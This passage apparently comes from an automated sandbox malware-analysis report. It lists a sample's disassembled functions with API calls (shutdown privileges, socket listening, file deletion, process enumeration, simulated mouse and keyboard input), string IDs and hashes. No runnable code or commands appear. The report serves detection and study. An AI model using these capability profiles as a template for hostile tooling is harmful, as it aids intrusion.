                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                • Opcode ID: efd56f7fb2e3db2d71a19d7dd3897c34e225da99b52342f82d85e42cb7284985
                                                                                • Instruction ID: 07f29886a190ce82b9a029f3f036c314497761e1415cc60c82052bd774da4844
                                                                                • Opcode Fuzzy Hash: efd56f7fb2e3db2d71a19d7dd3897c34e225da99b52342f82d85e42cb7284985
                                                                                • Instruction Fuzzy Hash: D741CE35604652AFD720DF15D888B69BBE6FF44328F14C09AE455CB762C776EC42CB90
                                                                                Function 0063E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 006316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063170D
                                                                                  • Part of subcall function 006316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0063173A
                                                                                  • Part of subcall function 006316C3: GetLastError.KERNEL32 ref: 0063174A
                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 0063E932
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                • String ID: $ $@$SeShutdownPrivilege
                                                                                • API String ID: 2234035333-3163812486
                                                                                • Opcode ID: b907bfe8b454cf97a7faed6e6471bfa248dfa3b607d7e358968d7257253ae526
                                                                                • Instruction ID: d75076d318b3fbd88b8c801e9b9378b735074f14f44e07e014bb5a1d0aeb4ed0
                                                                                • Opcode Fuzzy Hash: b907bfe8b454cf97a7faed6e6471bfa248dfa3b607d7e358968d7257253ae526
                                                                                • Instruction Fuzzy Hash: 8E01F972610211AFEB5426B49C86FFF725E9714761F154426FD03F21D1D6A25C4083F4
                                                                                Function 00651204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000001,00000006), ref: 00651276
                                                                                • WSAGetLastError.WSOCK32 ref: 00651283
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 006512BA
                                                                                • WSAGetLastError.WSOCK32 ref: 006512C5
                                                                                • closesocket.WSOCK32(00000000), ref: 006512F4
                                                                                • listen.WSOCK32(00000000,00000005), ref: 00651303
                                                                                • WSAGetLastError.WSOCK32 ref: 0065130D
                                                                                • closesocket.WSOCK32(00000000), ref: 0065133C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                • String ID:
                                                                                • API String ID: 540024437-0
                                                                                • Opcode ID: adafe00be47bbda7f7ae499d4a52ecd00af805c64226e467f119ca4523aa52d5
                                                                                • Instruction ID: 2717898f450db9a16b96adfb5d17e82d766ec30a55c5a71f31c4554790dd634b
                                                                                • Opcode Fuzzy Hash: adafe00be47bbda7f7ae499d4a52ecd00af805c64226e467f119ca4523aa52d5
                                                                                • Instruction Fuzzy Hash: 5241A2316001019FD720DF28C498B69BBE6BF86329F18818DD8568F392C771ED86CBE1
                                                                                Function 0060B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0060B9D4
                                                                                • _free.LIBCMT ref: 0060B9F8
                                                                                • _free.LIBCMT ref: 0060BB7F
                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00673700), ref: 0060BB91
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,006A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0060BC09
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,006A1270,000000FF,?,0000003F,00000000,?), ref: 0060BC36
                                                                                • _free.LIBCMT ref: 0060BD4B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                • String ID:
                                                                                • API String ID: 314583886-0
                                                                                • Opcode ID: 7e1a9722d2a10782bc8b9de4f3540f9c18fdd406530444e90100353e7755093c
                                                                                • Instruction ID: 543c063723d0ece424cb26de6455420c91a8d63577086ff5e5ff498f3374553e
                                                                                • Opcode Fuzzy Hash: 7e1a9722d2a10782bc8b9de4f3540f9c18fdd406530444e90100353e7755093c
                                                                                • Instruction Fuzzy Hash: B7C13971A842059FDB1CAF688C51BEBBBABEF42310F18A55EE490D73D1DB309E418B54
                                                                                Function 0063D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005D3A97,?,?,005D2E7F,?,?,?,00000000), ref: 005D3AC2
                                                                                  • Part of subcall function 0063E199: GetFileAttributesW.KERNEL32(?,0063CF95), ref: 0063E19A
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0063D420
                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0063D470
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0063D481
                                                                                • FindClose.KERNEL32(00000000), ref: 0063D498
                                                                                • FindClose.KERNEL32(00000000), ref: 0063D4A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 2649000838-1173974218
                                                                                • Opcode ID: 2200bc6b9193d55ceccb38a59298a32e83e194fe9af5eea48647452e47f478a1
                                                                                • Instruction ID: 327a77b33d7112b9130b8b8b40944b96136f81b1d59305ead39fb2201c10f6c4
                                                                                • Opcode Fuzzy Hash: 2200bc6b9193d55ceccb38a59298a32e83e194fe9af5eea48647452e47f478a1
                                                                                • Instruction Fuzzy Hash: B93152710083459BC315EF64D8558AF7BE9BED1314F44491FF4D193291EB30AA09D7A3
                                                                                Function 0060E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: __floor_pentium4
                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                • API String ID: 4168288129-2761157908
                                                                                • Opcode ID: 184f87ea2842a0f540750ba96c2fbdf345601e3b7664349357f94cc3f71cca41
                                                                                • Instruction ID: dd4d93f26be35c409a7a956e2b8f994f18382fd835de9266b633c583fdfce65d
                                                                                • Opcode Fuzzy Hash: 184f87ea2842a0f540750ba96c2fbdf345601e3b7664349357f94cc3f71cca41
                                                                                • Instruction Fuzzy Hash: 66C23A71E446298FDB39CF289D407EAB7B6EB44304F1445EAD44EE7281E779AE818F40
                                                                                Function 0064648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 006464DC
                                                                                • CoInitialize.OLE32(00000000), ref: 00646639
                                                                                • CoCreateInstance.OLE32(0066FCF8,00000000,00000001,0066FB68,?), ref: 00646650
                                                                                • CoUninitialize.OLE32 ref: 006468D4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                • String ID: .lnk
                                                                                • API String ID: 886957087-24824748
                                                                                • Opcode ID: efd5d40ba9611728f23bf19a9b6ca0d603bad0d1ac524f0f0329f501040c130a
                                                                                • Instruction ID: c9f8540c17f03ac503a36d68ee2d46cb817ba09ba7b46cc8f2a8c32a85409b77
                                                                                • Opcode Fuzzy Hash: efd5d40ba9611728f23bf19a9b6ca0d603bad0d1ac524f0f0329f501040c130a
                                                                                • Instruction Fuzzy Hash: 62D13A715082029FC314DF28C8859ABBBE9FFD9704F40496EF5958B2A1EB71ED05CB92
                                                                                Function 006522DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 006522E8
                                                                                  • Part of subcall function 0064E4EC: GetWindowRect.USER32(?,?), ref: 0064E504
                                                                                • GetDesktopWindow.USER32 ref: 00652312
                                                                                • GetWindowRect.USER32(00000000), ref: 00652319
                                                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00652355
                                                                                • GetCursorPos.USER32(?), ref: 00652381
                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006523DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                • String ID:
                                                                                • API String ID: 2387181109-0
                                                                                • Opcode ID: 3da2a8c3d5cce6481f92b5ba6b232c1c3c26cf3e9be5ef0eea858efe30a0c4f4
                                                                                • Instruction ID: a702c37791fdc16a9fd16d9ff2c0f27bfb36fbc001b04158e9d1df689c2a77f5
                                                                                • Opcode Fuzzy Hash: 3da2a8c3d5cce6481f92b5ba6b232c1c3c26cf3e9be5ef0eea858efe30a0c4f4
                                                                                • Instruction Fuzzy Hash: 4831CF72504716ABC720DF54CC45BABBBAAFF85314F00091DF98597291DB75EA08CB92
                                                                                Function 00649B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00649B78
                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00649C8B
                                                                                  • Part of subcall function 00643874: GetInputState.USER32 ref: 006438CB
                                                                                  • Part of subcall function 00643874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00643966
                                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00649BA8
                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00649C75
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                • String ID: *.*
                                                                                • API String ID: 1972594611-438819550
                                                                                • Opcode ID: da230f8ff5f2d504ab973647a6f4812f1f25cce61384a3ffdc32bd27a2cd0acd
                                                                                • Instruction ID: ea2b32c24ad05f8f08545efe4f9f5af9f8b896d11e157c1db5fe49d5410c4ce4
                                                                                • Opcode Fuzzy Hash: da230f8ff5f2d504ab973647a6f4812f1f25cce61384a3ffdc32bd27a2cd0acd
                                                                                • Instruction Fuzzy Hash: C641817198060A9FCF14DF64C989AEFBBBAFF45310F244156F805A2291EB309E44CF61
                                                                                Function 005E997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 005E9A4E
                                                                                • GetSysColor.USER32(0000000F), ref: 005E9B23
                                                                                • SetBkColor.GDI32(?,00000000), ref: 005E9B36
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Color$LongProcWindow
                                                                                • String ID:
                                                                                • API String ID: 3131106179-0
                                                                                • Opcode ID: fed453fd958ca4e90b44c1a4bdff3972076b7aaf30e9a57d3be5852134e9b186
                                                                                • Instruction ID: f64f9067f9a3e9f0ce982d03fccfa0910c421cb24ecab851fb2dc03c97c8087a
                                                                                • Opcode Fuzzy Hash: fed453fd958ca4e90b44c1a4bdff3972076b7aaf30e9a57d3be5852134e9b186
                                                                                • Instruction Fuzzy Hash: F8A12BB01089A4BEE72CAA3E9C58DBB2E5FFF83344F140519F482DA691CA259D01D676
                                                                                Function 00651806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0065304E: inet_addr.WSOCK32(?), ref: 0065307A
                                                                                  • Part of subcall function 0065304E: _wcslen.LIBCMT ref: 0065309B
                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 0065185D
                                                                                • WSAGetLastError.WSOCK32 ref: 00651884
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 006518DB
                                                                                • WSAGetLastError.WSOCK32 ref: 006518E6
                                                                                • closesocket.WSOCK32(00000000), ref: 00651915
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 1601658205-0
                                                                                • Opcode ID: b949e7ab7dac1f76446d7a530b82df59d8061833ef1082e7d50919c276c91992
                                                                                • Instruction ID: 21f34ace4f3a658d0e3a636ee958fdd72c4dbd7409415ad90513daf6d591e0fe
                                                                                • Opcode Fuzzy Hash: b949e7ab7dac1f76446d7a530b82df59d8061833ef1082e7d50919c276c91992
                                                                                • Instruction Fuzzy Hash: FF51C575A002119FDB20EF28C88AF6A7BE6AB85718F04845DF9459F3C3D771AD41CBA1
                                                                                Function 00661C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                • String ID:
                                                                                • API String ID: 292994002-0
                                                                                • Opcode ID: 71be9c14f04c42888e4ad14088656b102e015e9d71d292bdb07fd74a6397b5d2
                                                                                • Instruction ID: b6132443f79adac1692d9714746055467995ced7413c5f87e13fabc4fa95baf2
                                                                                • Opcode Fuzzy Hash: 71be9c14f04c42888e4ad14088656b102e015e9d71d292bdb07fd74a6397b5d2
                                                                                • Instruction Fuzzy Hash: E421D3317406015FD7208F1AC854BAA7BE6FF96324B1C8059E846CF351CBB5EC42CB94
                                                                                Function 005D8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                • API String ID: 0-1546025612
                                                                                • Opcode ID: 1efed9ddb98e1abf2765d94ca5c327f1ca9616483012b52709e8c64693c01d31
                                                                                • Instruction ID: 3cc5ca700f83020143112caf83927ab2af2ec70c68af4c3dca0d1679d7edfe30
                                                                                • Opcode Fuzzy Hash: 1efed9ddb98e1abf2765d94ca5c327f1ca9616483012b52709e8c64693c01d31
                                                                                • Instruction Fuzzy Hash: 0AA22975A0061ACBDF34CF58C9407FDBBB2BB54314F2885AAE816A7385DB749D81CB90
                                                                                Function 00638298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006382AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: ($tbi$|
                                                                                • API String ID: 1659193697-2401483324
                                                                                • Opcode ID: c0951e141b50cbfbbff2ec7e25916b7716a1e78331d3f9e1f2aafa0d1dc10ac5
                                                                                • Instruction ID: e5778b384e7e027709ef94649779526286ca14f0b1163671bf64a7d50dd4ad00
                                                                                • Opcode Fuzzy Hash: c0951e141b50cbfbbff2ec7e25916b7716a1e78331d3f9e1f2aafa0d1dc10ac5
                                                                                • Instruction Fuzzy Hash: 4A323574A007059FDB28CF59C481AAAB7F1FF48710B15846EE49ADB3A1EB70E941CB80
                                                                                Function 0065A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0065A6AC
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0065A6BA
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0065A79C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0065A7AB
                                                                                  • Part of subcall function 005ECE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00613303,?), ref: 005ECE8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                • String ID:
                                                                                • API String ID: 1991900642-0
                                                                                • Opcode ID: a5c9e7504deaade8fdb249d509e7a2a9fa77eab37e0f38ff580c8c35821631b8
                                                                                • Instruction ID: 0257dd6760120d17d827509b0547a8d57a953c2232dbbc19c21c919960f19597
                                                                                • Opcode Fuzzy Hash: a5c9e7504deaade8fdb249d509e7a2a9fa77eab37e0f38ff580c8c35821631b8
                                                                                • Instruction Fuzzy Hash: EF5149715083019FD710EF28C88AA6BBBE9FFC9754F00891EF98597291EB70D904CB92
                                                                                Function 0063AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0063AAAC
                                                                                • SetKeyboardState.USER32(00000080), ref: 0063AAC8
